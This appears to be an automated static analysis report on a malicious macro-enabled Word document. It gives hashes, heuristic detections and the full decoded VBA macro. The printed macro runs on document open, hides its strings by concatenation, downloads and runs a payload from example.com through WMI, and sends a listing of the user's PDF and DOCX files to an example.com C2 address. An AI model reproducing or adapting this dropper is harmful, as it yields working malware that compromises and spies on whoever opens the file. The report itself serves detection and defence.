Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 947cab564d239cec…

MALICIOUS

Office (OOXML) / .DOCX

Size: 19.2 KB | Created: 2026-05-08 15:48:00 UTC | Authoring application: Microsoft Office Word 16.0000 | First seen: 2026-06-19
MD5: 38e6e33fa949ea47e907e6d1156e86f6 | SHA-1: b1b9680b3397f90231ebe537bedaa509a9919af2 | SHA-256: 947cab564d239cec9e84c9c21692d96c6bdb141978af8575fb522431bb43cf31
Risk Score: 350

Heuristics (9)

  • VBA project inside OOXML [medium] (7 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
        strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script:
        strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-and-drop dropper, even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
            objStream.Write objXMLHTTP.ResponseBody
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script:
        strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
        strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched line in script:
        Set objWMIService = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "/" & "/" & "." & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2")
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
        Private Sub Document_Open()
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/ink (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (referenced by macro)
    • http://schemas.microsoft.com/office/2019/extlst (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex (referenced by macro)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (referenced by macro)
    • http://schemas.microsoft.com/office/word/2018/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2023/wordml/word16du (referenced by macro)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash (referenced by macro)
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock (referenced by macro)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source from OOXML) | Size: 3333 bytes
SHA-256: 5afc07df0404d9b1122ceee265dc07bd2ea461a02b993f40b0674f232b3cd8b7
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim objWMIService As Object
    Dim objProcess As Object
    Dim objFSO As Object
    Dim objFolder As Object
    Dim objFile As Object
    Dim strDocumentsPath As String
    Dim strPayloadURL As String
    Dim strPayloadPath As String
    Dim strC2Server As String
    Dim strDataToSend As String
    Dim objXMLHTTP As Object
    Dim objStream As Object
    
    ' Set paths and URLs
    strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
    strPayloadURL = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "e" & "x" & "a" & "m" & "p" & "l" & "e" & ".c" & "o" & "m" & "/" & "p" & "a" & "y" & "l" & "o" & "a" & "d" & ".e" & "x" & "e"
    strPayloadPath = CreateObject("W" & "Script" & ".Shell").ExpandEnvironmentStrings("%A" & "P" & "P" & "D" & "A" & "T" & "A%") & "\" & "p" & "a" & "y" & "l" & "o" & "a" & "d" & ".e" & "x" & "e"
    strC2Server = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "e" & "x" & "a" & "m" & "p" & "l" & "e" & ".c" & "o" & "m" & "/" & "c" & "2"
    
    ' Download payload
    Set objXMLHTTP = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & ".X" & "M" & "L" & "H" & "T" & "T" & "P")
    objXMLHTTP.Open "G" & "E" & "T", strPayloadURL, False
    objXMLHTTP.Send
    
    If objXMLHTTP.Status = 200 Then
        Set objStream = CreateObject("A" & "D" & "O" & "D" & "B" & ".S" & "t" & "r" & "e" & "a" & "m")
        objStream.Type = 1 ' adTypeBinary
        objStream.Open
        objStream.Write objXMLHTTP.ResponseBody
        objStream.SaveToFile strPayloadPath, 2 ' adSaveCreateOverWrite
        objStream.Close
    End If
    
    ' Execute payload using WMI
    Set objWMIService = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "/" & "/" & "." & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2")
    Set objProcess = objWMIService.Get("W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s")
    objProcess.Create strPayloadPath, Null, Null, intProcessID
    
    ' Discovery: Enumerate .pdf and .docx files in Documents folder
    Set objFSO = CreateObject("S" & "c" & "r" & "i" & "p" & "t" & "i" & "n" & "g" & ".F" & "i" & "l" & "e" & "S" & "y" & "s" & "t" & "e" & "m" & "O" & "b" & "j" & "e" & "c" & "t")
    Set objFolder = objFSO.GetFolder(strDocumentsPath)
    
    For Each objFile In objFolder.Files
        If LCase(Right(objFile.Name, 4)) = ".p" & "d" & "f" Or LCase(Right(objFile.Name, 5)) = ".d" & "o" & "c" & "x" Then
            ' Collect metadata or contents (example: file name and size)
            strDataToSend = strDataToSend & "F" & "i" & "l" & "e" & ": " & objFile.Name & ", " & "S" & "i" & "z" & "e" & ": " & objFile.Size & vbCrLf
        End If
    Next
    
    ' Send collected data to C2 server
    Set objXMLHTTP = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & ".X" & "M" & "L" & "H" & "T" & "T" & "P")
    objXMLHTTP.Open "P" & "O" & "S" & "T", strC2Server, False
    objXMLHTTP.Send strDataToSend
End Sub
Filename: vbaProject_00.bin | Kind: vba-project | Source: OOXML VBA project: word/vbaProject.bin | Size: 12800 bytes
SHA-256: b6079d2df4cd70db766ec65992cb59c3859f31b26adf5468a6983ec6882f8ffc